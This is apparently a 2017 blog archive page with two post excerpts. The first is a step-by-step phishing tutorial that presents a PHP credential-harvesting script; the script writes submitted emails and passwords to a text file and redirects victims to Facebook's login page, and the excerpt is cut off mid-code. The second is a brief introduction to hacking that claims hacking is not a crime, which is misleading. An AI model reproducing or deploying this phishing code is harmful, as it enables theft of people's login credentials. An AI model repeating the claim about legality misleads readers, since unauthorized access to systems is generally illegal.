Posts

Showing posts from June, 2017

What is Phishing? How Hackers Hack Through Phishing Attack

Image
Phishing is a term used to describe a malicious individual or group of individuals who scam users. Phishing is a type of social engineering attack often used to steal user data, including login credentials and credit card numbers. Phishing is the process of directing users to enter details into a fake website that look and feel like the legitimate one. Basically all you are doing is getting your target to login to your fake login page and you will be sent their  email and password. PHISIHING TUTORIAL STEP BY STEP: 1. Creating Phishing.php file Even if you don't have any knowledge of php file simply copy the following script and save it as  phishing.php  . <?php header("Location: https://www.facebook.com/login.php"); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "="); fwrite($handle, $value); fwrite($ha

Introduction to Hacking

Image
    In computer networking, hacking is any technical effort to manipulate the normal behavior of network connections and connected systems. Hacking is the process of exploiting vulnerabilities to gain unauthorized access to systems or resources. In computing, a hacker is any skilled computer expert that uses their technical knowledge to overcome a problem.  Hacker is a term used by some to mean "a clever programmer" and by others, especially those in popular media, to mean "someone who tries to break into computer systems.   Hacking is not a crime & Hackers are not criminals. Hacker means "a clever programmer " who tries to break into computer systems.